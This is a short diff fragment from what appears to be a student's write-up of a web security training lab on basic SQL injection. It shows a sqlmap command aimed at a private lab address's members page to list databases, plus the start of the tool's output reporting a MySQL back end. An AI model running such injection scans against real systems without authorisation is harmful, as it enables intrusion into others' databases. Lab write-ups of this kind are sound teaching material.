lindanip/Darkly/00_SQL_injection_basic/explaination/explianation.md

 ```bash
 sqlmap -u '10.203.72.119/?page=members&id=1' --dbs
 ```
-We then get this output
+We then get the following output
 ```bash
 [03:54:15] [INFO] the back-end DBMS is MySQL
 back-end DBMS: MySQL >= 5.5